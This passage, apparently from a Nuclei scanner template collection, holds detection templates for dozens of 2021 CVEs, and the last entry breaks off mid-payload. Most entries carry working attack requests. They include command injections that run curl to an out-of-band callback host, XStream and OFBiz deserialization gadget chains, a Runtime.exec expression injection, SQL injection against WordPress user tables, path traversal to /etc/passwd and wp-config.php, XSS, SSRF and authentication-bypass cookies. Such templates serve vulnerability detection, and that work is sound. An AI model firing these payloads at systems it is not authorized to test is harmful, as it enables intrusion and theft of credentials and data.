Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46422","info":{"name":"SDT-CW3B1 1.1.0 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<CmdResult>"]},{"type":"word","name":"http","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2021-26295","info":{"name":"Apache OFBiz <17.12.06 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n<soapenv:Envelope\n  xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ns1:clearAllEntityCaches xmlns:ns1=\"http://ofbiz.apache.org/service/\">\n          <ns1:cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</ns1:cus-obj>\n      </ns1:clearAllEntityCaches>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["errorMessage"],"condition":"and"},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2021-24278","info":{"name":"WordPress Contact Form 7 <2.3.4 - Arbitrary Nonce Generation","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=wpcf7r_get_nonce&param=wp_rest","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"success\":true","\"nonce\":\"[a-f0-9]+\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["\"nonce\":\"[a-f0-9]+\""],"part":"body"}]}]},{"id":"CVE-2021-32789","info":{"name":"WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500"],"matchers-condition":"and","matchers":[{"type":"word","words":["sqli-test","attribute_counts","price_range","term"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42565","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35380","info":{"name":"TermTalk Server 3.24.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/file?valore=../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2021-40149","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/self.key"],"matchers-condition":"and","matchers":[{"type":"word","words":["-----BEGIN RSA PRIVATE KEY-----","-----END RSA PRIVATE KEY----"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21881","info":{"name":"Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic dXNlcjp1c2Vy\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46UEFTUw==\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-37573","info":{"name":"Tiny Java Web Server - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<H2>404 te<img src=x onerror=alert(42)>st not found</H2>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-24746","info":{"name":"WordPress Sassy Social Share Plugin <3.3.40 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts","{{BaseURL}}/{{slug}}/?a&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["?a\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"slug","group":1,"regex":["\"slug\":\"([_a-z-A-Z0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-3378","info":{"name":"FortiLogger 4.4.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: application/json\nReferer: {{BaseURL}}\nConnection: close\nX-Requested-With: XMLHttpRequest\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"file\"; filename=\"poc.txt\"\nContent-Type: image/png\n\n{{randstr}}\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n","GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"word","part":"header","words":["text/plain","ASP.NET"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27124","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /patient/search_result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nexpertise=Heart'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL--+-&submit=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","Doctor Appoinment System"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22707","info":{"name":"EVlink City < R8 V3.4.0.1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin\n"],"host-redirects":true,"max-redirects":2,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","words":["?worker=Cluster\" name=\"cluster\" id=\"id_cluster"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21800","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>SSH Session </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25063","info":{"name":"WordPress Contact Form 7 Skins <=2.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>' type='hidden"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21479","info":{"name":"SCIMono <0.0.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"],"matchers":[{"type":"word","part":"body","words":["The attribute value","java.lang.UNIXProcess@","has invalid value!","\"status\" : \"400\""],"condition":"and"}]}]},{"id":"CVE-2021-24320","info":{"name":"WordPress Bello Directory & Listing Theme <1.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27748","info":{"name":"IBM WebSphere HCL Digital Experience - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/docpicker/internal_proxy/http/oast.me","{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me"],"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25008","info":{"name":"The Code Snippets WordPress Plugin < 2.14.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","Snippets"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41826","info":{"name":"PlaceOS 1.2109.1 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/logout?continue=//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301],"condition":"or"}]}]},{"id":"CVE-2021-24875","info":{"name":"WordPress eCommerce Product Catalog <3.0.39 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"eCommerce Product Catalog\")"],"condition":"and"}]}]},{"id":"CVE-2021-21345","info":{"name":"XStream <1.4.16  - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\n        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\n          <packet>\n            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\n              <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>\n                <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>\n                  <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>\n                    <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>\n                      <jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>\n                      <uriProperties/>\n                      <attributeProperties/>\n                      <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>\n                        <getter>\n                          <class>com.sun.corba.se.impl.activation.ServerTableEntry</class>\n                          <name>verify</name>\n                          <parameter-types/>\n                        </getter>\n                      </inheritedAttWildcard>\n                    </bi>\n                    <tagName/>\n                    <context>\n                      <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>\n                        <outer-class reference='../..'/>\n                      </marshallerPool>\n                      <nameList>\n                        <nsUriCannotBeDefaulted>\n                          <boolean>true</boolean>\n                        </nsUriCannotBeDefaulted>\n                        <namespaceURIs>\n                          <string>1</string>\n                        </namespaceURIs>\n                        <localNames>\n                          <string>UTF-8</string>\n                        </localNames>\n                      </nameList>\n                    </context>\n                  </bridge>\n                </bridge>\n                <jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>\n                  <activationCmd>curl http://{{interactsh-url}}</activationCmd>\n                </jaxbObject>\n              </dataSource>\n            </message>\n            <satellites/>\n            <invocationProperties/>\n          </packet>\n        </indexMap>\n      </comparator>\n    </default>\n    <int>3</int>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-24510","info":{"name":"WordPress MF Gig Calendar <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id=\"></script><script>alert(document.domain)</script><\" HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43778","info":{"name":"GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29505","info":{"name":"XStream <1.4.17 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n    <unserializable-parents/>\n    <java.util.PriorityQueue>\n        <default>\n            <size>2</size>\n        </default>\n        <int>3</int>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\n                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\n                    <parsedMessage>true</parsedMessage>\n                    <soapVersion>SOAP_11</soapVersion>\n                    <bodyParts/>\n                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\n                        <attachmentsInitialized>false</attachmentsInitialized>\n                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\n                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>\n                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>\n                                    <names>\n                                        <string>aa</string>\n                                        <string>aa</string>\n                                    </names>\n                                    <ctx>\n                                        <environment/>\n                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>\n                                            <java.rmi.server.RemoteObject>\n                                                <string>UnicastRef</string>\n                                                <string>{{interactsh-url}}</string>\n                                                <int>1099</int>\n                                                <long>0</long>\n                                                <int>0</int>\n                                                <long>0</long>\n                                                <short>0</short>\n                                                <boolean>false</boolean>\n                                            </java.rmi.server.RemoteObject>\n                                        </registry>\n                                        <host>{{interactsh-url}}</host>\n                                        <port>1099</port>\n                                    </ctx>\n                                </candidates>\n                            </aliases>\n                        </nullIter>\n                    </sm>\n                </message>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n    </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-24150","info":{"name":"WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.oast.me')}}\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46071","info":{"name":"ehicle Service Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_category HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1\n","GET /admin/?page=maintenance/category HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-35464","info":{"name":"ForgeRock OpenAM <7.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/oauth2/..;/ccversion/Version"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Set-Cookie: JSESSIONID="]},{"type":"word","part":"body","words":["Version Information -","openam/ccversion/Masthead.jsp"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45043","info":{"name":"HD-Network Realtime Monitoring System 2.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /language/lang HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nCookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24370","info":{"name":"WordPress Fancy Product Designer <4.6.9  - Arbitrary File Upload","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"error\":\"You need to define a directory"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39312","info":{"name":"WordPress True Ranker <2.2.4 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nsrc=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20123","info":{"name":"Draytek VigorConnect 1.6.0-B - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything","{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24274","info":{"name":"WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32030","info":{"name":"ASUS GT-AC2900 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: asusrouter--\nReferer: {{BaseURL}}\nCookie: asus_token=\\0Invalid; clickedItem_tab=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["get_cfg_clientlist","alias","model_name"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39316","info":{"name":"WordPress DZS Zoomsounds <=6.50 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20090","info":{"name":"Buffalo WSR-2533DHPL2 - Path Traversal","severity":"critical"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["URLToken(cgi_path)","pppoe","wan"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44848","info":{"name":"Thinfinity VirtualUI User Enumeration","severity":"medium"},"requests":[{"raw":["GET /changePassword?username=administrator HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"rc\":(.*?)","\"msg\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35265","info":{"name":"MaxSite CMS > V106 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E","{{BaseURL}}/page/1%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>"]},{"type":"word","part":"body","words":["mso-comments-rss\">RSS</a>","MaxSite CMS","feed\"><span>RSS</span>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33564","info":{"name":"Ruby Dragonfly <1.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==","{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24245","info":{"name":"WordPress Stop Spammers <2021.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP+Cookie+check;\n\nlog=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["ad\" accesskey=X onclick=alert(1)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38751","info":{"name":"ExponentCMS <= 2.6 - Host Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Host":"{{randstr}}.tld"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}.tld","EXPONENT.PATH","EXPONENT.URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43495","info":{"name":"AlquistManager Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/asd/../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-21351","info":{"name":"XStream <1.4.16 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>\n      <m__DTMXRTreeFrag>\n        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>\n          <m__size>-10086</m__size>\n          <m__mgrDefault>\n            <__overrideDefaultParser>false</__overrideDefaultParser>\n            <m__incremental>false</m__incremental>\n            <m__source__location>false</m__source__location>\n            <m__dtms>\n              <null/>\n            </m__dtms>\n            <m__defaultHandler/>\n          </m__mgrDefault>\n          <m__shouldStripWS>false</m__shouldStripWS>\n          <m__indexing>false</m__indexing>\n          <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>\n            <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>\n              